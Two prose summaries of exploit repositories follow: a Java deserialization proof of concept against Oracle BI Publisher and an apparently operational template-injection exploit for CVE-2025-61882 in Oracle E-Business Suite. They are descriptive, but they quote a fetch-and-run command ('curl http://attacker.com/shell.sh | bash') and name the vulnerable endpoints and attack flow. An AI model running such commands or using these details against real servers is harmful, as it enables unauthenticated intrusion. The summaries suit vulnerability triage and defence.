Unauthenticated RCE in Oracle E-Business Suite Concurrent Processing BI Publisher Integration

Repository contains a small proof-of-concept for unauthenticated remote code execution against Oracle BI Publisher (versions listed in README: 12.2.1.4.0, 12.2.1.3.0) via insecure Java deserialization in an integration component. Structure: - README.md: Describes the affected product/versions and states the issue is RCE via insecure deserialization. - exploit.java: Demonstrates crafting and sending a Java serialized object over a raw TCP socket to host "oracle-server" on port 9704. It hardcodes a command payload ("curl http://attacker.com/shell.sh | bash") and references generating a CommonsBeanutils1 gadget chain via ysoserial, but the actual gadget generation is a placeholder (generatePayload returns null) and the code as written is incomplete (e.g., missing ByteArrayOutputStream import). - exploit.sh: Alternative delivery simulation using curl to POST a serialized payload file (payload.ser) to http://192.168.1.100:9704/xmlpserver with Content-Type: application/java-serialized-object. Capabilities: - Intended capability is network-based delivery of a malicious Java serialized object to trigger deserialization and execute an arbitrary OS command on the target. - Includes a staged command that retrieves and executes a remote script, implying post-exploitation such as a reverse shell. Notable limitations: - Java exploit is not fully functional without implementing gadget generation (ysoserial integration) and fixing missing imports; thus it is best categorized as a POC rather than an operational exploit.

This repository provides a working exploit and scanner for CVE-2025-61882, a critical unauthenticated remote code execution vulnerability in Oracle E-Business Suite (EBS) BI Publisher/template processing (12.2.x series). The exploit leverages a server-side template injection via the '/OA_HTML/configurator/UiServlet' endpoint, allowing an attacker to execute arbitrary system commands on the EBS server without authentication. The repository contains three main Python scripts: - 'scan.py': A non-destructive scanner to probe for the presence of vulnerable endpoints on a target EBS instance. - 'exploit.py': The main exploit script, which interacts with the target, obtains necessary CSRF tokens, and triggers the vulnerability by referencing a malicious XSLT payload hosted on an attacker-controlled server. - 'server.py': A simple HTTP server that serves the malicious XSLT payload. The payload is dynamically generated to execute arbitrary commands (e.g., reverse shell, calc.exe) on the target, using Java reflection and scripting features available in the Oracle EBS Java backend. The exploit is operational and customizable, requiring the attacker to specify the target URL and the address of the attacker's payload server. The attack is performed over HTTP(S) and does not require authentication or user interaction. The README provides detailed usage instructions, legal disclaimers, and defensive recommendations. The code is cleanly separated into scanning, exploitation, and payload hosting components, making it straightforward to use in a test or lab environment. Key fingerprintable endpoints include '/OA_HTML/configurator/UiServlet', '/OA_HTML/runforms.jsp', and '/OA_HTML/JavaScriptServlet' on the target, as well as '/OA_HTML/help/../ieshostedsurvey.xsl' and '/OA_HTML/help/../ibeCRgpIndividualUser.jsp' on the attacker's server.